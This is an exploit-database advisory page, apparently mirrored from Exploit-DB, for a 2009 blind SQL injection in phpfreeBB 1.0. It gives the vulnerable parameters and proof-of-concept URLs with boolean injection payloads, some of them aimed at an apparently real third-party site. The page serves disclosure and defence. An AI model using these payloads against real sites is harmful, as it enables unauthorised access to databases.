header-logo
Suggest Exploit
vendor:
phpfreebb
by:
Moudi
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: phpfreebb
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpfreebb:phpfreebb:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability

phpfreeBB 1.0 is vulnerable to a Blind SQL Injection vulnerability. This vulnerability is due to the application failing to properly sanitize user-supplied input to the 'id' and 'year/archive' parameters of the 'permalink.php' and 'index.php' scripts. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify sensitive data in the back-end database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://prdownloads.sourceforge.net/phpfreebb/bb.zip?download
           http://phpfreebb.sourceforge.net/

Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php

*/

[+] Exploit bSQL:

- Vulnerable code in permalink.php (id).
- Vulnerable code in index.php (year/archive).

- Poc:
  http://127.0.0.1/permalink.php?id=[bSQL]
  http://127.0.0.1/index.php?archive=[NB]&year=[bSQL]

  http://kumi.awardspace.com/diary/permalink.php?id=9+and+1=1 TRUE
  http://kumi.awardspace.com/diary/permalink.php?id=9+and+1=2 FALSE

  http://kumi.awardspace.com/diary/index.php?archive=5&year=2008+and+1=1 TRUE
  http://kumi.awardspace.com/diary/index.php?archive=5&year=2008+and+1=2 FALSE

# milw0rm.com [2009-08-18]

Navigation

Suggest Exploit

Services By CQR